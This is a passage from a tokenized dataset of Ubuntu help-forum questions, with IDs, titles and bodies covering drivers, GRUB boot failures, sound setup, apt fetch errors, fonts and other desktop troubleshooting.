signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 310m ] ( rev a2 ) 03:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 07:00.0 system peripheral : jmicron technology corp. sd/mmc host controller ( rev 80 ) 07:00.2 sd host controller : jmicron technology corp. standard sd host controller ( rev 80 ) 07:00.5 ethernet controller : jmicron technology corp. jmc250 pci express gigabit ethernet controller ( rev 03 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 )
32022	how do i report a typo on the unity website ?	at http : //unity.ubuntu.com/about/ a powerful desktop and netbook environment things brings consistency and elegance to the ubuntu experience . i suggest `` things '' has to go in `` things brings ''
32024	how to create a .torrent using the command line ?	i 'm using mktorrent , but i 'm having problems with it since it does n't hash the files in the directory for some weird reason ... i 'm looking for a replacement specifically for command line
32029	how to config ddclient and make the pc in a nat availabe to a client in internet ?	how to config the ddclient to make my pc which is in nat accessible from a pc in the internet ?
32031	how do i configure a joystick or gamepad ?	i recently recieved a gamepad ( a joystick , like a ps2 controller ) from a friend . it 's a logitech rumblepad 2 . how would i configure this in ubuntu ? i would like to use a gui utility . i tried jstest-gui , but it shows my accelerometer : d !
32035	where is my xorg.conf file in my vbox virtual machine ?	i installed ubuntu 10.04 as a guest in a virtual machine in virtualbox . i also installed guest additions . my problem is that i can no longer find /etc/x11/xorg.conf . where has the file gone ... ? or more importantly , where do i modify the x11 settings to add a displaylink device ?
32041	running malwarebytes under wine 1.2.2	how can i get malwarebytes to run with wine under 10.04 ? i have wine version 1.2.2 at default settings . is there anything specific i need to do in order to get malwarebytes to run ? i am using the program to slave hdd 's from windows machines . being a technician it would make my life infinitely easier if i could get this to work . i guess i should mention that i successfully installed malwarebytes , but i ca n't get it to run . i double click the icon and nothing ever happens . any ideas or comments would be helpful . update : i looked at the appdb for wine and saw that it works with the older version 1.34 . i installed winetricks just like suggested and it works fine with the older version . i am now looking up how to update the definitions manually , which should n't be a problem because i 've had to do that in windows a few times . thanks so much for the help . also i 'm new to the askubuntu site obviously , and i 'm not used to the interface . i do n't know what i 'm supposed to do to let people know that my issue is resolved . i ended up putting a green arrow next to the result that fixed my issues , but if that is incorrect please let me know .
32042	wifi proprietary driver issue	i tried a 10.10 live cd and a pop-up directed me to install a proprietary driver for my wifi card before i could browse . however , my only means for internet access is through my school 's wireless access point . what do i do now , since i ca n't install the driver for the card , and the same card does n't allow me to connect to the wireless network ? this is an intel wireless card .
32047	sound issue with banshee , rhythmbox	i have a sound output problem whenever i play files in rhythmbox , and it 's the same in banshee . basically , although the files play fine , if i want to fast forward i get this annoying squeaky sound , in other words the transition is not smooth . strangely enough , if i play the same files in vlc and i fast forward , i do n't get that behavior and the transition is very smooth . is it a codec issue ? how can this be fixed ? any ideas anyone ? best regards .
32048	renumber pages of a pdf	i want to edit the metadata of a scanned pdf to assign custom page numbers to different pages . for example , what are now pages 1-3 i might want to call i , ii and iii , and what are pages 4-10 , i want to call 1-7 . i do not want to change the actual order of the pages . is there a ) a way to do this at all using free tools ; and b ) a way to do this `` in batch '' ( so , without having to renumber each page manually ) .
32050	how to mount ubuntu partitions in windows 7 64 bit	hi there well i just wanted to know how i can copy or add somethings in my ubuntu partition in windows 7 64 bit . i do n't want to be booting between the two oses . thanks in advance
32055	nvidia to ati card change over issue	i have added an ati card to my machine and want to use it instead of my onboard nvidia card . i tried to boot into ubuntu but the screen goes blank , fail safe grahics wo n't work either . i have sudo apt-get purge nvidia* and yet , i 'm still not able to boot in .
32058	is there a way to align desktop icons to ( a vertical and horizontal ) grid ?	is there a way to align desktop icons to ( a vertical and horizontal ) grid . like in windows for example .
32059	desktop does n't load due to intel_agp errors	today i have installed the ubuntu system on my notebook . after rebooting , i can not enter the desktop , the log program stopped in terminal , it says `` unknown signal '' from my intel graphic card , i915 : gave up waiting for init of module intel_agp . i915 : unknown symbol intel_agp_enabled ( err-16 ) i915 : gave up waiting for init of module intel_agp . i915 : unknown symbol intel_max_stolen ( err-16 ) and i think something bad happened to my driver , finally i can do nothing but enter commands in a text-mode terminal .
32060	2.6.35-28 kernel update breaks xorg	after i updated to 2.6.35-28 , my plymouth graphics still works , but when the system tries to launch x11 and gdm , the screen would flicker several times and it will fall back to tty . in the tty screen , above the login prompt is this message : can not find sep2_1-x32-2.6.35-28-genericsmp.ko in . directory . compile from source . well , that 's the gist of it anyway . i can still use my 2.6.36-27 . though i have no idea what 's causing this . when i upgrade to 2.6.36-27 , at first i had similar problems where gdm could n't start , though it did n't have this error message , it just said xorg crashed .
32063	experimental 3d support for nvidia cards	i recently installed an 11.04 alpha on my laptop . in the additional drivers program , it offers me `` experimental 3d support for nvidia cards '' . i went ahead and installed this to see how it works . seems at the very least good enough . it runs unity just fine . what exactly is being installed with the experimental driver ? how is it different from the default driver that ubuntu uses when it detects an nvidia card ?
32064	failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/release	get:1 http : //dl.google.com stable release.gpg [ 197b ] hit http : //archive.canonical.com maverick release.gpg ign http : //archive.canonical.com/ubuntu/ maverick/partner translation-en_in hit http : //security.ubuntu.com maverick-security release.gpg ign http : //security.ubuntu.com/ubuntu/ maverick-security/main translation-en_in ign http : //security.ubuntu.com/ubuntu/ maverick-security/restricted translation-en_in hit http : //archive.canonical.com maverick release ign http : //security.ubuntu.com/ubuntu/ maverick-security/universe translation-en_in ign http : //security.ubuntu.com/ubuntu/ maverick-security/multiverse translation-en_in hit http : //security.ubuntu.com maverick-security release hit http : //archive.canonical.com maverick/partner packages hit http : //security.ubuntu.com maverick-security/main packages hit http : //security.ubuntu.com maverick-security/restricted packages hit http : //security.ubuntu.com maverick-security/main sources hit http : //security.ubuntu.com maverick-security/restricted sources hit http : //security.ubuntu.com maverick-security/universe packages hit http : //security.ubuntu.com maverick-security/universe sources ign http : //dl.google.com/linux/chrome/deb/ stable/main translation-en_in hit http : //security.ubuntu.com maverick-security/multiverse packages hit http : //security.ubuntu.com maverick-security/multiverse sources get:2 http : //dl.google.com stable release [ 1,347b ] get:3 http : //dl.google.com stable/main packages [ 1,096b ] hit http : //in.archive.ubuntu.com maverick release.gpg ign http : //in.archive.ubuntu.com/ubuntu/ maverick/main translation-en_in ign http : //in.archive.ubuntu.com/ubuntu/ maverick/restricted translation-en_in ign http : //in.archive.ubuntu.com/ubuntu/ maverick/universe translation-en_in ign http : //in.archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en_in get:4 http : //in.archive.ubuntu.com maverick-updates release.gpg [ 198b ] ign http : //in.archive.ubuntu.com/ubuntu/ maverick-updates/main translation-en_in ign http : //in.archive.ubuntu.com/ubuntu/ maverick-updates/restricted translation-en_in ign http : //in.archive.ubuntu.com/ubuntu/ maverick-updates/universe translation-en_in ign http : //in.archive.ubuntu.com/ubuntu/ maverick-updates/multiverse translation-en_in err http : //in.archive.ubuntu.com maverick release err http : //in.archive.ubuntu.com maverick-updates release ign http : //in.archive.ubuntu.com maverick/main packages ign http : //in.archive.ubuntu.com maverick/restricted packages ign http : //in.archive.ubuntu.com maverick/main sources ign http : //in.archive.ubuntu.com maverick/restricted sources ign http : //in.archive.ubuntu.com maverick/universe packages ign http : //in.archive.ubuntu.com maverick/universe sources ign http : //in.archive.ubuntu.com maverick/multiverse packages ign http : //in.archive.ubuntu.com maverick/multiverse sources ign http : //in.archive.ubuntu.com maverick-updates/main packages ign http : //in.archive.ubuntu.com maverick-updates/restricted packages ign http : //in.archive.ubuntu.com maverick-updates/main sources ign http : //in.archive.ubuntu.com maverick-updates/restricted sources ign http : //in.archive.ubuntu.com maverick-updates/universe packages ign http : //in.archive.ubuntu.com maverick-updates/universe sources ign http : //in.archive.ubuntu.com maverick-updates/multiverse packages ign http : //in.archive.ubuntu.com maverick-updates/multiverse sources ign http : //in.archive.ubuntu.com maverick/main packages ign http : //in.archive.ubuntu.com maverick/restricted packages ign http : //in.archive.ubuntu.com maverick/main sources ign http : //in.archive.ubuntu.com maverick/restricted sources ign http : //in.archive.ubuntu.com maverick/universe packages ign http : //in.archive.ubuntu.com maverick/universe sources ign http : //in.archive.ubuntu.com maverick/multiverse packages ign http : //in.archive.ubuntu.com maverick/multiverse sources ign http : //in.archive.ubuntu.com maverick-updates/main packages ign http : //in.archive.ubuntu.com maverick-updates/restricted packages ign http : //in.archive.ubuntu.com maverick-updates/main sources ign http : //in.archive.ubuntu.com maverick-updates/restricted sources ign http : //in.archive.ubuntu.com maverick-updates/universe packages ign http : //in.archive.ubuntu.com maverick-updates/universe sources ign http : //in.archive.ubuntu.com maverick-updates/multiverse packages ign http : //in.archive.ubuntu.com maverick-updates/multiverse sources err http : //in.archive.ubuntu.com maverick/main packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/restricted packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/main sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/restricted sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/universe packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/universe sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/multiverse packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/multiverse sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/main packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/restricted packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/main sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/restricted sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/universe packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/universe sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/multiverse packages unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates/multiverse sources unable to connect to in.archive.ubuntu.com : http : fetched 2,838b in 5min 12s ( 9b/s ) reading package lists ... done w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/release w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/release w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/main/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/restricted/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/main/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/restricted/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/universe/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/universe/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/multiverse/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/multiverse/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/main/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/restricted/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/main/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/restricted/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/universe/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/universe/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/multiverse/binary-i386/packages.gz unable to connect to in.archive.ubuntu.com : http : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick-updates/multiverse/source/sources.gz unable to connect to in.archive.ubuntu.com : http : w : some index files failed to download , they have been ignored , or old ones used instead . this is what i got when update , i am using 10.04 lts , once i tried to upgrade to 10.10 , but ended up with error , since then all the updates are done from maverick , as you can see . now i 'm facing problem both in update and upgrade ( release upgrade too ) . is there a way to restore everything to its default , or anything else ...
32065	how can i tell if i am running 2d or 3d unity ?	i have just installed the ubuntu 11.04 alpha on my laptop . how can i tell whether i have the 2d or the 3d unity running ?
32070	how to write terminal contents into a file	here 's my situation : i open terminal and run program which displays live feed in terminal ( text ) what changes every second . only `` enter '' key can be used while this program is running ( it exits that program ) . so you ca n't type anything else into console . i would like to write that terminal contents into a file , like after every second . how do i do it ? by opening 2nd console and using some command ? ca n't get it work with setterm -dump command .
32071	gedit f9 side pane shortcut is not working	i am using gedit for some editing and when i use f9 in order to make side pane visible or invisible my display is just getting dim and nothing happens .
32074	font corruption on a netbook	lately i 'm getting really weird font issues . i 'm not sure what to make of it . here 's a picture .
32084	why does ubuntu use launchpad instead of github or bitbucket ?	i 've been wondering why most ubuntu projects use launchpad.net instead of github for the version control and bug tracking system . is there a specific reason as to why ubuntu uses launchpad ( and hence bzr ) ?
32086	can i force my huawei e1550 modem to be usable on another network ?	i have huawei e1550 3g modem and it is locked to network operator `` idea '' while using through windows ( which i do n't like ) . is it possible to use another network operator on this modem on ubuntu or is it also locked for ubuntu ? i am able to access internet using it via the default network operator , but not by another operator.is it my fault or its also locked on ubuntu ? but i have entered the correct settings . while checking for network locks using ixconn i found the following : - * test for netlock manufacturer : huawei model : e1550 revision : 11.608.13.02.00 imei : 354638041122655 +gcap : +cgsm , +fclass , +ds ok -- - no network locks recognized . -- - and it also shows the n/w operators availabe on doing gprs n/w analysis on doing at^cardlock ? i got 3,0,0 which mean that this ca n't be unlocked on connecting to internet it keeps searching network and never connects to internet ( except default operator ) i need explanation wether if its locked for ubuntu or not ? and if not whats the problem ?
32088	some fonts do n't appear in libreoffice	i installed some fonts ( mingliu.ttc ) by putting them in ~/.fonts/ the font is visible in other applications ( such as abiword & firefox ) . but it does not appear in the font menu of libreoffice . when i type the font name manually , the characters display as squares . how can i install the font for libreoffice ?
32089	evolution contacts not auto-populating	i am using ubuntu 10.04 lts and evolution 2.28.3 . i have evolution configured to use my gmail contacts . when composing a message , entering addresses does not automatically resolve in any way . in order to use an address from my contacts , i need to click on the to : button and select contacts from the list . the list itself is fine - all my contacts are present . is there any way to have evolution automatically resolve email addresses as i type ? i 've looked through the preferences and found nothing helpful .
32092	change the font color for the skype panel ?	so i just installed skype and i 'm using the ambiance theme that comes with ubuntu 10.10 . it looks like the font color for the text in the skype panel is the same as the background color for panels in the ambiance theme . is there any way to change the font color in the panel just for skype ? i did a : find . -name `` skype '' and checked some of the conf files but did n't see anything related to text color .
32093	how can i convert an avi file to a blackberry-compatible format ?	i need a program to convert an avi file to a format compatible with my blackberry . on windows , i 've tried format factory and converted the .avi file to .3gp , but the output is of very bad quality .
32094	how to partition seagate freeagent goflex 2tb hard disk ?	hi i bought a new seagate 2tb external hard disk . i opened the drive 's application in my virtual windows , did product registration using the application present in it . i have few questions on how best to use it . the drive by default has some files and folders - setup.exe , system volume information , usb 3.0 pc card adapter etc , . i copied all the files to my laptop . is it safe to delete these files ? it has a dash board for windows which allows to tune power options , test the drive etc . will i be able to use the dash board if i put back all these files and mount on windows again ? i want to partition and format the hard disk . data i like to store is around 10 to 20 gb files - virtual box images . around 4gb files - dvd images . other movies and personal files . what is the best filesystem to store very huge files like 10 to 20gb files . so that they are written and accessed fast also best uses the drive 's capacity . if i leave one of the partition as ntfs and others to different files systems , will it be able to mount on windows and will i be able to use the device 's dash board ? note : i dont need any encryption for my data . any other advice on using the hard disk is also welcome .
32098	why does ubuntu need to reboot so often ?	ubuntu seems to require a reboot after almost every apt update , even those that do not include a new kernel version . why ?
32107	how to avoid `` assuming drive cache : write through '' message during restart ?	does anyone know how to avoid message : assuming drive cache : write through showing up after preforming sudo shutdown -r now . i restarted remotely but the computer did not restart . and i could not restore my remote connection to it . i want to be sure , that it wo n't happen again . when i physically approached the computer and turned on the display , i found 3 lines with messages : assuming drive cache : write through all those messages were because of my sdd disk . later i checked and found , that sdd is my external usb 1tb disk . any ideas , on how to prevent such situations in future ?
32112	grep , ignore warnings	i am trying to find the installation directory of a particular package . i have a certain keyword using which i am trying to find a particular file . during grep , i only want to include cpp or h file type . i do not want the grep to show warnings like permission denied or could not find the directory . i just want it to display matched files , nothing else . please suggest how can i do this ? at present i am using grep `` my term '' -ir -- exclude-dir= '' \.svn '' -- include=* . { cpp , h } ./
32120	how to detect another sudo process ?	whenever a command is `` unable to lock the administration directory '' , is there any way to easily detect what process is running that is using sudo ?
32121	gnome menu with mouse up to the top	i am just starting with linux . i have noticed that though gnome has a fixed menu ( gnome panel ) at the top of the screen , similarly to mac os x , it is impossible to click a menu item after moving the mouse all the way up , to the very edge of the screen . it looks as if there is a one pixel border between the menu and the screen top edge . is it possible to remove it ?
32123	how can i use apt-get to list all packages written in c ?	is there any way i can use apt-get to give me a list of all packages written in c , or having c modules in them ?
32125	is it possible to change how update manager displays the updates ?	is it possible to change the way how update manager displays the updates currently available ? currently ( in maverick 10.10 ) the packages are shown with their description in a larger font , and their package name ( and size ) in smaller font . i would prefer having the other way round : read easily what 's the package name in question , and if i do n't recognize what is it , read in smaller text what that package does .
32131	surround sound and video setup	ok. we 're trying ( really hard ) to port from windows to linux ( ubuntu to be exact ) problem is ... i just does n't work as good as a windows box ... the box is to function as a media centre and all reviews seen , just does not match up ( unless those guys never used windows ever ) the box consists of : - intel dual core lga 775 3.2ghz proc kingston 4gb ddr-3 memory seagate 1tb sata-2 hdd asustek computer inc. p5kpl-vm motherboard nvidia corporation gt216 [ geforce gt 220 ] os : ubuntu 10.10 x64 desktop the propriety driver for the gt220 was installed . ubuntu restricted media formats were installed . software in question : - mythtv and movie player problems is : video is choppy ... er .. horizontal `` lines '' can be seen within the parts of the screen that has the most movement . only stereo sound can be obtained from a 5.1 surround setup three weeks later ... and i 'm tired with this setup ... therefore this posting is my final attempt prior to moving back to windows some debug info : - lspci -v 00:00.0 host bridge : intel corporation 4 series chipset dram controller ( rev 03 ) subsystem : asustek computer inc. device 836d flags : bus master , fast devsel , latency 0 capabilities : < access denied > kernel modules : intel-agp 00:01.0 pci bridge : intel corporation 4 series chipset pci express root port ( rev 03 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : fd000000-fe9fffff prefetchable memory behind bridge : 00000000de000000-00000000efffffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) subsystem : asustek computer inc. device 8445 flags : bus master , fast devsel , latency 0 , irq 43 memory at fcffc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : hda intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 00001000-00001fff memory behind bridge : 80000000-801fffff prefetchable memory behind bridge : 0000000080200000-00000000803fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 01 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : fea00000-feafffff prefetchable memory behind bridge : 0000000080400000-00000000805fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) ( prog-if 00 [ uhci ] ) subsystem : asustek computer inc. p5kpl-vm , p5ld2-vm mainboard flags : bus master , medium devsel , latency 0 , irq 23 i/o ports at c480 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) ( prog-if 00 [ uhci ] ) subsystem : asustek computer inc. p5kpl-vm , p5ld2-vm mainboard flags : bus master , medium devsel , latency 0 , irq 19 i/o ports at c800 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) ( prog-if 00 [ uhci ] ) subsystem : asustek computer inc. p5kpl-vm , p5ld2-vm mainboard flags : bus master , medium devsel , latency 0 , irq 18 i/o ports at c880 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) ( prog-if 00 [ uhci ] ) subsystem : asustek computer inc. p5kpl-vm , p5ld2-vm mainboard flags : bus master , medium devsel , latency 0 , irq 16 i/o ports at cc00 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) ( prog-if 20 [ ehci ] ) subsystem : asustek computer inc. p5kpl-vm , p5ld2-vm mainboard flags : bus master , medium devsel , latency 0 , irq 23 memory at fcffbc00 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=32 memory behind bridge : feb00000-febfffff capabilities : < access denied > 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) subsystem : asustek computer inc. p5kpl-vm motherboard flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel modules : leds-ss4200 , itco_wdt , intel-rng 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) ( prog-if 8f [ master secp seco prip prio ] ) subsystem : asustek computer inc. p5kpl-vm motherboard flags : bus master , medium devsel , latency 0 , irq 18 i/o ports at b800 [ size=8 ] i/o ports at b480 [ size=4 ] i/o ports at 08f0 [ size=8 ] i/o ports at 08f8 [ size=4 ] i/o ports at b000 [ size=16 ] kernel driver in use : ata_piix 00:1f.2 ide interface : intel corporation n10/ich7 family sata ide controller ( rev 01 ) ( prog-if 8f [ master secp seco prip prio ] ) subsystem : asustek computer inc. p5kpl-vm motherboard flags : bus master , 66mhz , medium devsel , latency 0 , irq 22 i/o ports at c400 [ size=8 ] i/o ports at c080 [ size=4 ] i/o ports at c000 [ size=8 ] i/o ports at bc00 [ size=4 ] i/o ports at b880 [ size=16 ] capabilities : < access denied > kernel driver in use : ata_piix 01:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 220 ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) subsystem : nvidia corporation device 0715 flags : bus master , fast devsel , latency 0 , irq 16 memory at fd000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at de000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at dc00 [ size=128 ] [ virtual ] expansion rom at fe900000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia-current , nouveau , nvidiafb 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) subsystem : nvidia corporation device 0715 flags : bus master , fast devsel , latency 0 , irq 16 memory at fe9fc000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : hda intel kernel modules : snd-hda-intel 02:00.0 ethernet controller : atheros communications ar8131 gigabit ethernet ( rev c0 ) subsystem : asustek computer inc. device 83fe flags : bus master , fast devsel , latency 0 , irq 44 memory at feac0000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at ec00 [ size=128 ] capabilities : < access denied > kernel driver in use : atl1c kernel modules : atl1c 04:01.0 multimedia controller : philips semiconductors saa7131/saa7133/saa7135 video broadcast decoder ( rev d0 ) subsystem : asustek computer inc. p7131 dual flags : bus master , medium devsel , latency 64 , irq 16 memory at febff800 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : saa7134 kernel modules : saa7134 aplay -l default pulse playback/recording through the pulseaudio sound server front : card=intel , dev=0 hda intel , alc887 analog front speakers surround40 : card=intel , dev=0 hda intel , alc887 analog 4.0 surround output to front and rear speakers surround41 : card=intel , dev=0 hda intel , alc887 analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=intel , dev=0 hda intel , alc887 analog 5.0 surround output to front , center and rear speakers surround51 : card=intel , dev=0 hda intel , alc887 analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=intel , dev=0 hda intel , alc887 analog 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=intel , dev=0 hda intel , alc887 digital iec958 ( s/pdif ) digital audio output dmix : card=intel , dev=0 hda intel , alc887 analog direct sample mixing device dmix : card=intel , dev=1 hda intel , alc887 digital direct sample mixing device dsnoop : card=intel , dev=0 hda intel , alc887 analog direct sample snooping device dsnoop : card=intel , dev=1 hda intel , alc887 digital direct sample snooping device hw : card=intel , dev=0 hda intel , alc887 analog direct hardware device without any conversions hw : card=intel , dev=1 hda intel , alc887 digital direct hardware device without any conversions plughw : card=intel , dev=0 hda intel , alc887 analog hardware device with all software conversions plughw : card=intel , dev=1 hda intel , alc887 digital hardware device with all software conversions hdmi : card=nvidia , dev=0 hda nvidia , nvidia hdmi hdmi audio output hdmi : card=nvidia , dev=1 hda nvidia , nvidia hdmi hdmi audio output hdmi : card=nvidia , dev=2 hda nvidia , nvidia hdmi hdmi audio output hdmi : card=nvidia , dev=3 hda nvidia , nvidia hdmi hdmi audio output dmix : card=nvidia , dev=3 hda nvidia , nvidia hdmi direct sample mixing device dmix : card=nvidia , dev=7 hda nvidia , nvidia hdmi direct sample mixing device dmix : card=nvidia , dev=8 hda nvidia , nvidia hdmi direct sample mixing device dmix : card=nvidia , dev=9 hda nvidia , nvidia hdmi direct sample mixing device dsnoop : card=nvidia , dev=3 hda nvidia , nvidia hdmi direct sample snooping device dsnoop : card=nvidia , dev=7 hda nvidia , nvidia hdmi direct sample snooping device dsnoop : card=nvidia , dev=8 hda nvidia , nvidia hdmi direct sample snooping device dsnoop : card=nvidia , dev=9 hda nvidia , nvidia hdmi direct sample snooping device hw : card=nvidia , dev=3 hda nvidia , nvidia hdmi direct hardware device without any conversions hw : card=nvidia , dev=7 hda nvidia , nvidia hdmi direct hardware device without any conversions hw : card=nvidia , dev=8 hda nvidia , nvidia hdmi direct hardware device without any conversions hw : card=nvidia , dev=9 hda nvidia , nvidia hdmi direct hardware device without any conversions plughw : card=nvidia , dev=3 hda nvidia , nvidia hdmi hardware device with all software conversions plughw : card=nvidia , dev=7 hda nvidia , nvidia hdmi hardware device with all software conversions plughw : card=nvidia , dev=8 hda nvidia , nvidia hdmi hardware device with all software conversions plughw : card=nvidia , dev=9 hda nvidia , nvidia hdmi hardware device with all software conversions tv @ tv-system-product-name : ~ $ pavucontrol only provides `` analogue stereo ouput '' as an option on the `` internal audio '' device , which is the only functional option . speaker-test -c 6 -dplug : surround51 -t wav provides only the `` lady 's voice '' on the front left and front right speakers . what bugs me the most , is that one just can not find any proper solution to the sound issue . in addition , would someone be as kind as clearing the usage / dependency / requirements of `` alsa '' and `` pulseaudio '' ? does one still need alsa with pulseaudio ? and for the life of me , i can not find a working `` mixer console '' for pulseaudio ( therefore the query above ) alsamixer nor kmix works ? will there be help or should i switch back to microsoft ?
32134	odd grub 2 config problem with 10.10 64 bit	i damaged my grub2 config . i can still easily launch my otherwise healthy ubuntu 10.10 64 bit system using partition magic 's super grub disk 2 's `` detect any os '' utility , but when i try to boot from the system drive via it 's grub2 installation , i get : error : out of disk . error : symbol not found : 'grub_os_area_addr ' . error : symbol not found : 'grub_os_area_addr ' . failed to boot both default and fallback entries . press any key to continue ... per some advice i saw on the web , i booted the system back up using pm 's utility , completely uninstalled grub2 , grub-common , etc. , made sure my /etc/grub.d directory was empty , reinstalled grub2 from synaptic , and ran update-grub , at which point it found my linux install and completed with no errors . when i reboot now , i get the correct grub menu ( there 's only one linux install on the system - i do n't have other disks/partitions with oses ) , but when it tries to launch it , it fails as described above . when i look at the grub command that partition magic 's utility generates that actually works ( generated from the grub2 `` edit command '' option you can use before launch ) , it says : set root=hd5,1 linux /boot/vmlinuz-2.6.35-28-generic root= < the correct uuid > ro initrd /boot/initrd.img-2.6.35-28-generic however when i look at ( from the grub 